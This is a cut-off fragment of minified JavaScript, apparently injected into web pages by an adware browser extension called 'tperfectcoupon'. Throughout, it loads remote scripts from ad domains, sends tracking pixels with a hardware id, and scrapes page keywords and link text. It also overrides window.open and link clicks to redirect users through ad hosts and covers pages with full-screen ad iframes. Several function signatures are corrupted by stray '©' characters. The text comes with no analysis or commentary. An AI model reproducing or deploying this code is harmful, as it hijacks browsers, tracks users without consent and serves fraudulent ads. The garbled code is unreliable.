\"tperfectcoupon\"};';\ndocument.getElementsByTagName(\"head\")[0].appendChild(a);a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//asrv-a.akamaihd.net/sd/1017/1008.js\";a.setAttribute(\"id\",\"qwejkhjkshdf\");document.getElementsByTagName(\"head\")[0].appendChild(a)}})()}catch(ex){};;(function(){if(!document.getElementById(\"sdfhtyconfsc\")&&window.self==window.top){var a=document.createElement(\"script\");a.src=\"//fp130.digitaloptout.com/pubjs?pid=630992&sid=684_1&an=tperfectcoupon&opt=1&tc=http%3A%2F%2Fsavemassit.info%2Fterms.html&&pp=http%3A%2F%2Fsavemassit.info%2Fprivacy.html&cid=7\";a.type=\"text/javascript\";a.setAttribute(\"id\",\"sdfhtyconfsc\");document.getElementsByTagName(\"head\")[0].appendChild(a)}})();;var fghjktghndfgt = (function fghjktghndfgt_init(){new function(){if(!document.getElementById('__fghjktghndfgt_once')){(function(){var a=document.createElement('div');a.id='__fghjktghndfgt_once';a.setAttribute('style','display:none;');var c=document.getElementsByTagName('body')[0];c&&c.appendChild(a)})();var a=this;a.pid='1';a.cc='US';a.eid='684';a.ename='tperfectcoupon';a.hid='14365491252932439287';a.debugMode=!1;a.utils=new function(){var b=this;'function'!==typeof String.prototype.trim&&(String.prototype.trim=function(){return this.replace(/^\\s+|\\s+$/g,'')});b.JSON=new function(){this.parse=function©{try{return'undefined'!==typeof JSON&&'function'==typeof JSON.stringify?JSON.parse©:eval('var a='+c)}catch(a){return!1}}};b.cookie=new function(){var c=this;c.setCookie=function(c,a,b){var f='';'string'===typeof b?f='; expires='+b:'number'===typeof b&&(f=new Date,f.setTime(f.getTime()+864E5*b),f='; expires='+f.toGMTString());document.cookie=c+'='+a+f+'; path=/'};c.getCookie=function©{c+='=';for(var a=document.cookie.split(';'),b=0;b<a.length;b++){for(var f=a[b];' '==f.charAt(0);)f=f.substring(1,f.length);if(0==f.indexOf©)return f.substring(c.length,f.length)}return null};c.eraseCookie=function(a){c.setCookie(a,'',-1)}};b.getProtocol=function©{var a=document.createElement('a');a.href=c;return a.protocol};b.getHostName=function©{if(!c)return'';var a=document.createElement('a');a.href=c;return a.hostname};b.isMenuBarVisible=function(){if(!b.msie&&window.menubar)return window.menubar.visible;if('object'==typeof WebBrowser2)return WebBrowser2.MenuBar;if(b.msie)return!0;var c=window.innerWidth||document.documentElement.scrollWidth||0,a=window.innerHeight||document.documentElement.scrollHeight||0;if©{window.resizeTo(c,a);var g=window.innerWidth||document.documentElement.scrollWidth,e=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(c+2,a);c=window.scrollWidth||document.documentElement.scrollWidth;return!(c!=g&&c<=g+2&&90>=a-e)}};b.getInstructions=function(c,d){b.msie?b.inject_script(c+('&cb='+a.prefix+'.'+d)):b.ajax.get(c,function©{if©a[d]©})};b.l=new function(){var c=this;c.xlat='abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/';c.encode=function(a){a=c._utf8_encode(a);for(var b='',e=0;e<a.length;){var f=a.charCodeAt(e++),h=a.charCodeAt(e++),l=a.charCodeAt(e++),k=f>>2,f=(f&3)<<4|h>>4,n=(h&15)<<2|l>>6,m=l&63;isNaN(h)?n=m=64:isNaN(l)&&(m=64);b=b+c.xlat.charAt(k)+c.xlat.charAt(f)+(64==n?'=':c.xlat.charAt(n))+(64==m?'=':c.xlat.charAt(m))}return b};c._utf8_encode=function©{if(c&&c.length){for(var a='',b=0;b<c.length;b++){var f=c.charCodeAt(b);128>f?a+=String.fromCharCode(f):(127<f&&2048>f?a+=String.fromCharCode(f>>6|192):(a+=String.fromCharCode(f>>12|224),a+=String.fromCharCode(f>>6&63|128)),a+=String.fromCharCode(f&63|128))}return a}return c};c.decode=function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,'');for(var b='',e=0;e<a.length;){var f=c.xlat.indexOf(a.charAt(e++)),h=c.xlat.indexOf(a.charAt(e++)),l=c.xlat.indexOf(a.charAt(e++)),k=c.xlat.indexOf(a.charAt(e++)),n=(h&15)<<4|l>>2,m=(l&3)<<6|k,b=b+String.fromCharCode(f<<2|h>>4);64!=l&&0<n&&(b+=String.fromCharCode(n));64!=k&&0<m&&(b+=String.fromCharCode(m))}return this._utf8_decode(b)};c._utf8_decode=function(a){for(var c='',b=0;b<a.length;){var f=a.charCodeAt(b);if(128>f)c+=String.fromCharCode(f),b++;else if(191<f&&224>f)var h=a.charCodeAt(b+1),c=c+String.fromCharCode((f&31)<<6|h&63),b=b+2;else var h=a.charCodeAt(b+1),l=a.charCodeAt(b+2),c=c+String.fromCharCode((f&15)<<12|(h&63)<<6|l&63),b=b+3}return c}};b.ajax=new function(){this.get=function(c,a){try{var b=new XMLHttpRequest;b.open('GET',c,!0);b.withCredentials=!0;b.onreadystatechange=function(){4==b.readyState&&a(b.responseText)};b.send()}catch(e){}}};b.randomChar=function(){for(var a='',b=0;2>b;b++)a+='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.charAt(Math.floor(52*Math.random()));return a};b.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();b.inject_script=function©{var b=document.getElementsByTagName('body')[0],g=document.createElement('script');g.type='text/javascript';g.id='id_'+a.prefix;g.src=c;b&&b.appendChild(g)};b.epoch=function(){return Math.floor((new Date).getTime()/1E3)};b.getVert=function(){var a=localStorage.getItem('sk398erjds2d');return a?a:b.forexVert()};b.browser=function(){var a=navigator.userAgent.toLowerCase(),b={webkit:/webkit/.test(a),mozilla:/mozilla/.test(a)&&!/(compatible|webkit)/.test(a),chrome:/chrome/.test(a),msie:/msie/.test(a)&&!/opera/.test(a),firefox:/firefox/.test(a),safari:/safari/.test(a)&&!/chrome/.test(a),opera:/opera/.test(a)};b.version=b.safari?(a.match(/.+(?:ri)[\\/: ]([\\d.]+)/)||[])[1]:(a.match(/.+(?:ox|me|ra|ie)[\\/: ]([\\d.]+)/)||[])[1];return b}();b.getNodeTextProp=function(a){return'textContent'in a?'textContent':'innerText'in a?'innerText':!1};b.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,c,b){return b.toUpperCase()})};b.get_computed_style='function'!=typeof window.getComputedStyle?function(a){return{getPropertyValue:function(d){'float'==d&&(d='styleFloat');d=b.dhtml_prop_name(d);return'object'==typeof a.currentStyle&&null!=a.currentStyle&&'undefined'!=typeof a.currentStyle[d]?a.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};b.getEmptyWindow=function(){var a=document.createElement('iframe');a.src='about:blank';a.setAttribute('style','display:inline;width:1px;height:1px;padding:none;margin:none;');document.body.appendChild(a);return a.contentWindow}};a.prefix='fghjktghndfgtssss';a.extName='tperfectcoupon';a.version='0.1.1';a.pop_collision_id='__ipm=';a.pixelHostname='//mnh.unition.org/';a.watcherCount=0;a.fallbackHostnames=['compey.net','comprises.info'];try{a.stngs=a.utils.JSON.parse('{\"szy_domain\":[\"bestwebnutfunblack.com\",\"comprises.info\"],\"ad_sizes\":[[120,60,19],[630,250,22],[336,280,17],[630,500,23],[180,150,18],[234,60,15],[200,200,16],[600,400,13],[125,125,14],[670,670,11],[600,270,12],[800,600,21],[468,60,3],[800,440,20],[300,250,2],[728,90,1],[300,600,10],[120,240,7],[120,600,6],[160,600,5],[250,250,4],[240,400,8]]}')}catch(q){a.hostnames=a.fallbackHostnames}var p;p=''!==a.stngs&&a.stngs&&'undefined'!==typeof a.stngs.szy_domain&&a.stngs.szy_domain instanceof Array?a.stngs.szy_domain:a.fallbackHostnames;a.hostnames=p;a.debugMode&&(a.debug=new function(){var b=this;window.oldSetTimeout=window.setTimeout;window.oldSetInterval=window.setInterval;b.overrideSettimeout=function(){window.setTimeout=function(a,b){return window.oldSetTimeout(function(){try{console.log('%csetTimeout: '+a.toString(),'color:purple'),a()}catch(b){}},b)}};b.overrideSetinterval=function(){window.setInterval=function(a,b){return window.oldSetInterval(function(){try{console.log('setInterval: '+a.toString()),a()}catch(b){}},b)}};b.overrideVariables=function(){a.pid='12';a.cc='US';a.eid='10';a.hid='123456789';a.ename='QA extension';a.lt='2617.24';a.jpshort='_OXQj15i';a.platform_version='9'};b.init=function(){b.overrideSettimeout();b.overrideSetinterval();b.overrideVariables()};b.init()});a.legacyHostnames=['superiends.org','go.turboloves.net','installerapplicationusa.com','stylene.net'];a.body=document.getElementsByTagName('body')[0];a.params={subid:a.pid,subid1:a.hid,subid2:a.eid,'px.pluginh':1,tid:'7',red:'1',subid3:'mnhadz'};a.manhattanCookieInterval=0.0416;a.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(c,d,g,e,f){'undefined'==typeof e&&(e=window);e.addEventListener(c,d,g);f&&a.cache.push([c,d,g,e])}:window.attachEvent?function(c,d,g,e,f){'undefined'==typeof e&&(e=window);e['e'+c+d]=d;e[c+d]=function(){e['e'+c+d](window.event)};e.attachEvent('on'+c,e[c+d]);f&&a.cache.push([c,d,g,e])}:function(){};a.remove=window.removeEventListener?function(a,b,g,e){'undefined'==typeof e&&(e=window);e.removeEventListener(a,b,g)}:window.detachEvent?function(a,b,g,e){'undefined'==typeof e&&(e=window);e.detachEvent('on'+a,e[a+b]);e[a+b]=null;e['e'+a+b]=null}:function(){};a.flush=function(){for(var c=0;c<a.cache.length;c++)a.remove.apply(a,a.cache[c]);a.cache=[]}};a.pixel=function(b,c){var d=a.pixelHostname+'?',g=a.hostnames[0],g={pid:a.pid,cc:a.cc,eid:a.eid,hid:a.hid,v:a.version,ch:b,cid:0,tid:a.params.tid,adtid:0,smid:0,pbid:'0',oh:encodeURIComponent©,sh:encodeURIComponent(g)},e;for(e in g)d+=e+'='+g[e]+'&';d=d.slice(0,-1);if(21===b)return d=d.split('?')[1],a.utils.l.encode(d);(new Image).src=d};a.getKeywords=function(){var a=document.title,c=document.getElementsByTagName('meta');if©for(var d=0,g=c.length;d<g;d++)'keywords'!=c[d].name.toLowerCase()&&'description'!=c[d].name.toLowerCase()||(a+=' '+c[d].content.replace(/,/g,' '));if(d=document.getElementsByTagName('a')){c={};for(g=0;g<d.length;g++)try{var e=d[g].innerText;'undefined'==typeof e&&(e=d[g].textContent);for(var f=e.toLowerCase().split(/[\\s,-]/g),h=0;h<f.length;h++)4>f[h].length||(c[f[h]]?c[f[h]]++:c[f[h]]=1)}catch(l){}var e=[],k;for(k in c)e.push([k,c[k]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(k=0;k<e.length;k++)a+=' '+e[k][0]}return encodeURIComponent(a.replace(/[\\!\\[\\]_-]/g,' ').trim().substring(0,1500))};a.isFalseResponseFromServer=function(){-1<a.body.innerText.indexOf('e7hZBzqVfn==')&&window.close()};a.checkIfServer=function(){for(var b=0;b<a.hostnames.length;b++)if(location.hostname===a.hostnames[b])return a.isFalseResponseFromServer(),!0};a.checkIfPop=function(b,c,d){return!(d&&d.toString()||'').match(/^(a652c|ld893)_/)&&-1==document.cookie.indexOf('xcddsa')&&d!== \"r_ron_redir\"&&-1==b.indexOf('px.pluginh')&&-1==b.indexOf('earchfu')&&-1==location.href.indexOf('/amz/')&&-1==location.href.indexOf('/sd/dw32.html')&&-1==location.href.indexOf('/pop/1.1.00')&&!location.href.match(/cpops-\\d+\\.html/)&&-1==location.href.indexOf('px.pluginh')&&-1==b.indexOf('nkths.co')&&-1==b.indexOf('ally.asi')&&-1==b.indexOf('/sd/dw32.html')&&-1==b.indexOf('/pop/1.1.00')&&-1==b.indexOf('/amz/')&&!b.match(/cpops-\\d+\\.html/)&&-1==a.utils.getHostName(b).indexOf('getjs')&&-1==a.utils.getHostName(b).indexOf('hsbc')};window.self==window.top&&a.pixel(10,'0');-1<window.location.href.indexOf(a.pop_collision_id)&&window.self==window.top&&a.pixel(13,'0');a.addBlurredTabListener=function(b){var c;try{c=a.utils.getHostName(b.target.getAttribute('href'))}catch(d){c=''}'a'==b.target.tagName.toLowerCase()&&''==b.target.innerHTML&&b.target.getAttribute('href')&&!b.target.getAttribute('download')&&-1==c.indexOf(window.self.location.hostname)&&(c=b.target.getAttribute('href')?b.target.getAttribute('href'):'0',a.manhattanUrl=a.prepareUrl©,a.pixel(12,c),b.target.setAttribute('target',a.prefix),c=new Date,c.setHours(c.getHours()+5),a.utils.cookie.setCookie('vdsknj4th4uh','1',c.toUTCString()),b.target.setAttribute('href',a.manhattanUrl),document.getElementsByTagName('body')[0].removeEventListener('click',a.addBlurredTabListener))};a.prepareUrl=function(b){b='?';for(var c in a.params)b+=c+'='+a.params[c]+'&';b+='k='+a.getKeywords();return'http://'+a.hostnames[0]+b};try{window.top==window.self&&-1==document.cookie.indexOf('vdsknj4th4uh')&&window.name!==a.prefix&&a.overrideDispatchEvent()}catch®{}a.checkIfServer()||(a.cachedOpenFn=window.open,a.overrideDispatchEvent=function(){a.cachedDispatchEvent=document.createElement('a').constructor.prototype.dispatchEvent;document.createElement('a').constructor.prototype.dispatchEvent=function(b){var c;try{c=a.utils.getHostName(event.target.getAttribute('href'))}catch(d){c=''}'a'==this.tagName.toLowerCase()&&''==this.innerHTML&&'click'==b.type&&-1==c.indexOf(window.self.location.hostname)&&this.getAttribute('href')&&!this.getAttribute('download')&&(c=this.getAttribute('href')?this.getAttribute('href'):'0',a.manhattanUrl=a.prepareUrl©,a.pixel(12,c),this.setAttribute('target',a.prefix),c=new Date,c.setHours(c.getHours()+5),a.utils.cookie.setCookie('vdsknj4th4uh','1',c.toUTCString()),this.setAttribute('href',a.manhattanUrl));a.cachedDispatchEvent.call(this,b)}},a.overrideWindowOpen=function(){clearTimeout(a.timeout);window.open=function(b){return function(c,d,g){window.self==window.top&&a.pixel(11,'0');b=a.cachedOpenFn;if(a.checkIfPop(c,g,d))return d=new Date,d.setHours(d.getHours()+1),a.utils.cookie.setCookie('xcddsa','1',d.toUTCString()),a.manhattanUrl=a.prepareUrl©,d=a.prefix,a.pixel(20,c),a.manhattanOn=!0,a.utils.msie&&9>a.utils.msie?window.open(a.manhattanUrl,d,g):b.call(window,a.manhattanUrl,d,g);d=d||'';window.open=a.cachedOpenFn;return a.utils.msie&&9>a.utils.msie?window.open(c,d,g):b.call(window,c,d,g)}}(window.open);4<a.watcherCount||a.manhattanOn||(a.watcherCount++,a.openWatcher())},a.overrideDispatchEvent(),a.openWatcher=function(){a.timeout=setTimeout(a.overrideWindowOpen,200)},a.openWatcher(),'undefined'==typeof window[a.prefix]&&(window[a.prefix]=a))}};}).toString();(function(){if( window.top == window.self && window.name !== 'if72ru4sdfsdfruh7fewui' && !document.getElementById(\"fghjktghndfgt\") && document.getElementsByTagName('head').length ){var script         = document.createElement('script');script.id          = 'fghjktghndfgt';script.type        = \"text/javascript\";script.text        = fghjktghndfgt + \";fghjktghndfgt_init()\";document.getElementsByTagName('head')[0].appendChild(script)}}());;new function(){if(!document.getElementById('__if72ru4sdfsdfrkjahiuyi_once')){(function(){var c=document.createElement('div');c.id='__if72ru4sdfsdfrkjahiuyi_once';c.setAttribute('style','display:none;');var b=document.getElementsByTagName('body')[0];b&&b.appendChild©})();var a=this,d=a;a.hid='14365491252932439287';a.eid='684';a.pid='1';a.cc='US';a.extName='tperfectcoupon';a.OnloadCap=0;a.utils=new function(){var c=this;c.JSON=new function(){this.parse= function(b){try{return'undefined'!==typeof JSON&&'function'==typeof JSON.stringify?JSON.parse(b):eval('var a='+b)}catch(f){return!1}}};c.cookie=new function(){var b=this;b.setCookie=function(b,c,e){if(e){var a=new Date;a.setTime(a.getTime()+864E5*e);e='; expires='+a.toGMTString()}else e='';document.cookie=b+'='+c+e+'; path=/'};b.getCookie=function(b){b+='=';for(var c=document.cookie.split(';'),e=0;e<c.length;e++){for(var a=c[e];' '==a.charAt(0);)a=a.substring(1,a.length);if(0==a.indexOf(b))return a.substring(b.length, a.length)}return null};b.eraseCookie=function(f){b.setCookie(f,'',-1)}};c.getProtocol=function(b){var f=document.createElement('a');f.href=b;return f.protocol};c.getInstructions=function(b,f){c.msie&&11>c.msie?c.inject_script(b+('&cb='+d.prefix+'.'+f)):c.ajax.get(b,function(b){if(b)d[f](b)})};c.l=new function(){var b=this;b.xlat='abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/';b.encode=function(f){f=b._utf8_encode(f);for(var c='',e=0;e<f.length;){var a=f.charCodeAt(e++),d=f.charCodeAt(e++), m=f.charCodeAt(e++),k=a>>2,a=(a&3)<<4|d>>4,p=(d&15)<<2|m>>6,n=m&63;isNaN(d)?p=n=64:isNaN(m)&&(n=64);c=c+b.xlat.charAt(k)+b.xlat.charAt(a)+(64==p?'=':b.xlat.charAt(p))+(64==n?'=':b.xlat.charAt(n))}return c};b._utf8_encode=function(b){if(b&&b.length){for(var c='',a=0;a<b.length;a++){var d=b.charCodeAt(a);128>d?c+=String.fromCharCode(d):(127<d&&2048>d?c+=String.fromCharCode(d>>6|192):(c+=String.fromCharCode(d>>12|224),c+=String.fromCharCode(d>>6&63|128)),c+=String.fromCharCode(d&63|128))}return c}return b}; b.decode=function(b){b=b.toString().replace(/[^A-Za-z0-9\\+\\/]/g,'');for(var c='',a=0;a<b.length;){var d=this.xlat.indexOf(b.charAt(a++)),h=this.xlat.indexOf(b.charAt(a++)),m=this.xlat.indexOf(b.charAt(a++)),k=this.xlat.indexOf(b.charAt(a++)),p=(h&15)<<4|m>>2,n=(m&3)<<6|k,c=c+String.fromCharCode(d<<2|h>>4);64!=m&&0<p&&(c+=String.fromCharCode(p));64!=k&&0<n&&(c+=String.fromCharCode(n))}return this._utf8_decode©};b._utf8_decode=function(b){for(var c='',a=0;a<b.length;){var d=b.charCodeAt(a);if(128> d)c+=String.fromCharCode(d),a++;else if(191<d&&224>d)var h=b.charCodeAt(a+1),c=c+String.fromCharCode((d&31)<<6|h&63),a=a+2;else var h=b.charCodeAt(a+1),m=b.charCodeAt(a+2),c=c+String.fromCharCode((d&15)<<12|(h&63)<<6|m&63),a=a+3}return c}};c.ajax=new function(){this.get=function(b,c){try{var a=new XMLHttpRequest;a.open('GET',b,!0);a.withCredentials=!0;a.onreadystatechange=function(){4==a.readyState&&c(a.responseText)};a.send()}catch(e){}}};c.randomChar=function(){for(var b='',c=0;2>c;c++)b+='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.charAt(Math.floor(52* Math.random()));return b};c.msie=function(){var b=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(b)&&(b=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(b)?!1:b}();c.inject_script=function(b){var c=document.getElementsByTagName('body')[0],a=document.createElement('script');a.type='text/javascript';a.id='id_'+d.prefix;a.src=b;c&&c.appendChild(a)};c.epoch=function(){return Math.floor((new Date).getTime()/1E3)};c.getVert= function(){var b=localStorage.getItem('sk398erjds2d');return b?b:c.forexVert()};c.browser=function(){var b=navigator.userAgent.toLowerCase(),c={webkit:/webkit/.test(b),mozilla:/mozilla/.test(b)&&!/(compatible|webkit)/.test(b),chrome:/chrome/.test(b),msie:/msie/.test(b)&&!/opera/.test(b),firefox:/firefox/.test(b),safari:/safari/.test(b)&&!/chrome/.test(b),opera:/opera/.test(b)};c.version=c.safari?(b.match(/.+(?:ri)[\\/: ]([\\d.]+)/)||[])[1]:(b.match(/.+(?:ox|me|ra|ie)[\\/: ]([\\d.]+)/)||[])[1];return c}(); c.getNodeTextProp=function(b){return'textContent'in b?'textContent':'innerText'in b?'innerText':!1};c.dhtml_prop_name=function(b){return b.replace(/(\\-([a-z]){1})/g,function(b,c,a){return a.toUpperCase()})};c.get_computed_style='function'!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(a){'float'==a&&(a='styleFloat');a=c.dhtml_prop_name(a);return'object'==typeof b.currentStyle&&null!=b.currentStyle&&'undefined'!=typeof b.currentStyle[a]?b.currentStyle[a]:null}}}:function(b, c){return window.getComputedStyle(b,c)||{getPropertyValue:function(){}}};c.mapAdTypes=function(b){for(var c={},a=0;a<b.length;a++){var e=b[a];c['_'+e[2]]={key:e[0]+'x'+e[1]}}return c}};a.prefix='if72ru4rkjahiuyi';a.version='0.1.0';a.pop_collision_id='__ipu=';a.pixelHostname='//direct_pop.unition.org/';a.fallbackHostnames=['compey.net','comprises.info'];a.fallbackAdTypes={_1:{key:'728x90'},_2:{key:'300x250'},_3:{key:'468x60'},_4:{key:'250x250'},_5:{key:'160x600'},_6:{key:'120x600'},_7:{key:'120x240'}, _8:{key:'240x400'},_10:{key:'300x600'},_9:{key:'1024x728'},_11:{key:'670x670'},_12:{key:'600x270'},_13:{key:'600x400'}};try{a.stngs=a.utils.JSON.parse('{\"szy_domain\":[\"firstfunmegachina.in\",\"compey.info\"],\"ad_sizes\":[[120,60,19],[630,250,22],[336,280,17],[630,500,23],[180,150,18],[234,60,15],[200,200,16],[600,400,13],[125,125,14],[670,670,11],[600,270,12],[800,600,21],[468,60,3],[800,440,20],[300,250,2],[728,90,1],[300,600,10],[120,240,7],[120,600,6],[160,600,5],[250,250,4],[240,400,8]]}')}catch®{a.stngs=a.utils.JSON.parse('{\"szy_domain\":[\"skymetwebguard.com\",\"compey.info\"],\"ad_sizes\":[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10],[670,670,11],[600,270,12],[600,400,13],[125,125,14],[234,60,15],[200,200,16],[336,280,17],[180,150,18],[120,60,19],[800,440,20],[800,600,21]]}')}var q; q=''!==a.stngs&&a.stngs&&'undefined'!==typeof a.stngs.szy_domain&&a.stngs.szy_domain instanceof Array?a.stngs.szy_domain:a.fallbackHostnames;a.hostnames=q;q=''!==a.stngs&&a.stngs&&'undefined'!==typeof a.stngs.ad_sizes&&a.stngs.ad_sizes instanceof Array?a.utils.mapAdTypes(a.stngs.ad_sizes):a.fallbackAdTypes;a.adTypes=q;a.body=document.getElementsByTagName('body')[0];a.directParams={subid:d.pid,subid1:d.hid,subid2:d.eid,tid:'6'};a.dom=new function(){this.json_to_html=function(c,b){if('#text'==c.type)b= document.createTextNode(c.text);else if('#comment'!=c.type){b||(b=document.createElement(c.type));if(c.attrs){for(var a in c.attrs)if(c.attrs.hasOwnProperty(a))if('style'==a&&c.attrs.style instanceof Object)for(var g in c.attrs.style){var e=d.utils.dhtml_prop_name(g);try{b.style[e]=c.attrs.style[g]}catch(l){}}else b.setAttribute(a,c.attrs[a]);'iframe'==c.type&&(c.attrs.hasOwnProperty('frameborder')&&(b.frameBorder=c.attrs.frameborder),c.attrs.hasOwnProperty('marginwidth')&&(b.marginWidth=c.attrs.marginwidth), c.attrs.hasOwnProperty('marginheight')&&(b.marginHeight=c.attrs.marginheight))}if(c.children)for(a=0;a<c.children.length;a++){e=c.children[a];g=arguments.callee(e);try{b.appendChild(g)}catch(h){if('#text'==e.type&&'string'==typeof e.text)if('style'==c.type&&b.styleSheet)b.styleSheet.cssText=e.text||'';else if(g=d.utils.getNodeTextProp(b))b[g]=e.text}}}return b}};a.events=new function(){var c=this;c.cache=[];c.add=window.addEventListener?function(b,a,d,e,l){'undefined'==typeof e&&(e=window);e.addEventListener(b, a,d);l&&c.cache.push([b,a,d,e])}:window.attachEvent?function(b,a,d,e,l){'undefined'==typeof e&&(e=window);e['e'+b+a]=a;e[b+a]=function(){e['e'+b+a](window.event)};e.attachEvent('on'+b,e[b+a]);l&&c.cache.push([b,a,d,e])}:function(){};c.remove=window.removeEventListener?function(b,a,c,e){'undefined'==typeof e&&(e=window);e.removeEventListener(b,a,c)}:window.detachEvent?function(b,a,c,e){'undefined'==typeof e&&(e=window);e.detachEvent('on'+b,e[b+a]);e[b+a]=null;e['e'+b+a]=null}:function(){};c.flush= function(){for(var a=0;a<c.cache.length;a++)c.remove.apply(c,c.cache[a]);c.cache=[]}};a.pixel=function(c,b){var f=a.pixelHostname+'?',g=d.hostnames['https:'==window.self.location.protocol?0:1],g={pid:d.pid,cc:d.cc,eid:d.eid,hid:d.hid,v:d.version,ch:b,cid:d.response[0][2],tid:d.directParams.tid,adtid:d.response[0][4],smid:d.response[0][3],pbid:c,oh:encodeURIComponent(d.response[0][0]),sh:encodeURIComponent(g)},e;for(e in g)f+=e+'='+g[e]+'&';f=f.slice(0,-1);(new Image).src=f};a.products=new function(){this.code_7= function(a){function b(){var a=document.getElementById('__modal_close'),b=document.getElementById('__modal_container');d.events.add('click',function(){b.parentNode.removeChild(b)},!1,a,!1)}function f(){var a,b,c;'undefined'==typeof d.response[0][4]&&d.response[0].push(9);try{a=d.adTypes['_'+d.response[0][4]].key,b=a.split('x')[0]+'px',c=a.split('x')[1]+'px'}catch(e){}a=window.innerHeight;if(b&&c){var f=document.getElementById('__modal');f.style.width=b;f.style.height=c;f.style.marginLeft=parseInt(f.style.width)/ 2-parseInt(f.style.width)+'px';f.style.top=(a-parseInt(f.style.height))/2+'px'}}if((a=a[0][0])&&window.self.location.protocol===d.utils.getProtocol(a)&&!(d.utils.msie&&9>d.utils.msie)&&'http:'===a.split('/')[0]){var g={type:'div',attrs:{id:'__modal_container',style:{position:'fixed','z-index':'9999999999',height:'100%',width:'100%',margin:'0',padding:'0',background:'rgba(0,0,0,0.3)',top:'0',right:'0',bottom:'0',left:'0','border-radius':'0'}},children:[{type:'div',attrs:{id:'__modal',style:{position:'absolute', 'z-index':'99999999999',left:'50%',top:'10px','text-align':'left',width:'90%',margin:'0 0 0 -45%','background-color':'#FFFFFF',border:'1px solid #DDDDDD','border-radius':'5px',height:'90%',padding:'0'}},children:[{type:'div',attrs:{style:{margin:'0',padding:'2px',left:'0',width:'inherit',top:'0','background-color':'transparent'},id:'__modal_close'},children:[{type:'img',attrs:{src:'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABYAAAAWCAYAAADEtGw7AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAABA1JREFUeNp8VW9IW1cUP3l5eS9iZx+amsaNtNZsdtgttnSkBYmRLEsVs1rwi9Z9Udm6YZXYTr+MaMcm4idXPwTUD05BWP3bNBsleREUoabMTzr/wNxEjQqCgoj/Gr2792re8prUC4f3znnn/M65757zuwqEEMRbLMfxXzocV/MLCswfZ2bakpKSTAqFAra3t4ML//zr93pfjL3weOb29vYO4gIQ4GjBwWx1dbVlfn5e3NjYQBHBOpqamkLRtoWFBfEh9mUYhn0bR6ZotTrB5/O5SNDq6irq6OhAxcXFSK1Wy8Rms6G2tja0vLxME4iBgEt78aIQF1in0wnT09Nu4uj1epHRaEQ8z8eARovJZELj4+ORHbk/0OsFGTCLV2BkhFba1dUlBUYDn5WkpaWFggeDQRfHq1kJ2NXQaIlUelaFZ0l7ezsF/7mpyUKBNamp/NLSkogFZWVlyZytVivKz8+PATEYDKimpgZd0GolW9L582h2dhatra2JaWlpPNR+/9hIMrndbllwTk6OdPrNzc3UlpCQgLKzsykAsXd2dspinE4ntT958qORseZZzaTthoeHZS2I+xX29/epXlFRAY2NjYB3BL29vaDRaKh9Z2dHiiE9PjA0BMfHx3Dnjt0MoVDIs7i4GPe/lZaWopWVFaly4hd57+/vjxszMTGB1tfXPYxKpTJtbm7GDA1Zg4ODUFdXB4eHh1RPTEykz9HRUSgrK4s7cBgUlEqliSFbODo6kn0ktsjC0wW7u7uy78QWb0VjMViCycnJcR0/NRqhu7sbBEGgeiSovLwcGhoaqB4th+EwpKSkEJcgg8fSjwkGMjIyZKDJ2KEHg0aSku0/dNbCwcEJ51RWVkJ1TS28OQZ4g/OF8fMIi/7SJdja2vIzflEcI44Oh0MG/Mm1azLQkpISGHjWB85HjyXwz25eP/0H+Fzwo6joLrx37hw8/8M3Btdv3ODxKYuEvTSp2pi+rK+vp+/4kBEoT8RssZIJQ+kfZlJdgckNFCr00ucnHSMab97iaQf82tNDR7q1tfWdI0uAFcr/wRklhxiGk/QH335H27BvYMgiccXly+ks7mdKQlVVVTGgfIIasbRiVgIiVSpZkoxDn9vtmGbXSc+7dPp0Vkablrw8AQNT2mzC25RAsXBYlKqTKiPgzGmCr795gFZCIVKt2154V4hL9F/Y7QLJSsAnJycRHmWkuZCKOBWumFTHnACSX1J07x4KBEbo9jHxuAqLimVEr3j7zku/coV9+svTnNu3b/2AVSuZOsx8MDMzg09eAQbDR6DXv09PH6/Aq9d//uSsfTT+99xfYdmwvOsyzc3N5e/f/+pqYWGBmeM4GzaZTj8Fw+Gwf9Dz+9hvz/rmRsWXcS/T/wQYAL8KChTqW9Z8AAAAAElFTkSuQmCC', style:{cursor:'pointer'}}},{type:'span',attrs:{style:{position:'relative','margin-left':'20px','font-size':'12px','line-height':'33px'}},children:[{type:'#text',text:'Ads by '+d.extName}]}]},{type:'iframe',attrs:{style:{border:'0'},id:'__modal_iframe',width:'100%',height:'100%',frameboarder:'0',scrolling:'yes',marginheight:'0',marginwidth:'0',allowtransparency:'true',src:''}}]}]};try{var e=d.dom.json_to_html(g)}catch(l){}e&&(document.getElementsByTagName('body')[0].appendChild(e),document.getElementById('__modal_iframe').src= a,d.pixel('0','1'),b(),f())}}};a.getKeywords=function(){var a=document.title,b=document.getElementsByTagName('meta');if(b)for(var d=0,g=b.length;d<g;d++)'keywords'!=b[d].name.toLowerCase()&&'description'!=b[d].name.toLowerCase()||(a+=' '+b[d].content.replace(/,/g,' '));if(d=document.getElementsByTagName('a')){b={};for(g=0;g<d.length;g++)try{var 